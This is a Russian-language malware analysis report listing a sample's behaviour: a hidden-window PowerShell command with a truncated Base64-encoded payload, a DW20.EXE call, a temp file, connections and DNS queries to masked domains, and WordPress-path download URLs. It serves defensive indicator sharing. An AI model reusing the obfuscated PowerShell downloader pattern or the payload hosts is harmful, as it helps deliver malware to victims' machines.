Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0ADQAMQBBAEEARAB4AD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBYACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQBCACcALAAnAEsAJwApACwAJwBVAEcAJwApACkAOwAkAFoAM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1195451.cvr
- 'ca##r.com':80
- 'hu###omains.com':443
- 'mc##ur.es':80
- http://ca##r.com/wp-admin/M_V/
- http://mc##ur.es/wp-content/m_R/
- 'hu###omains.com':443
- DNS ASK se###way.com
- DNS ASK ik##an.org
- DNS ASK ca##r.com
- DNS ASK hu###omains.com
- DNS ASK qa###dad.com
- DNS ASK mc##ur.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0ADQAMQBBAEEARAB4AD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBYACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQBCACcALAAnAEsAJwApACwAJwBVAEcAJwApACkAOwAkAFoAM...' (со скрытым окном)